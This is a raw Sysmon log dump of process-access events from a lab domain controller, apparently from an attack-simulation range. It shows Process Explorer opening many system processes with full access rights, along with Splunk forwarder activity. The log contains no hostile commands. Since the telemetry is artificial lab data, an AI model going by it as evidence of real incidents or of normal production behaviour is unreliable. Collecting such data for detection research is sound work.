15:15:49.205{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785471Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.940{732C744F-3226-6010-BEA2-00000000A301}66806212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785470Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.784{732C744F-1593-600B-AC00-00000000A301}46563536C:\Windows\system32\conhost.exe{732C744F-3226-6010-BEA2-00000000A301}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785469Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.784{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785468Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.784{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.784{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.784{732C744F-151A-600B-0C00-00000000A301}5842624C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.784{732C744F-1517-600B-0500-00000000A301}640756C:\Windows\system32\csrss.exe{732C744F-3226-6010-BEA2-00000000A301}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000785464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.784{732C744F-1593-600B-A800-00000000A301}26163156C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{732C744F-3226-6010-BEA2-00000000A301}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000785463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.784{732C744F-3226-6010-BEA2-00000000A301}6680C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000785462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.268{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+4e7ac|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+50417|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22bb|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.268{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77951|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+77a03|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b2ca|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscordbi.dll+1b1c9|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+6e587|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a22a8|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.268{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a210b|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\winsta.dll+1178|C:\Windows\SYSTEM32\winsta.dll+10b5|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+9d7f4|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a17fa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3226-6010-BDA2-00000000A301}5880C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a165c|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:50.252{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 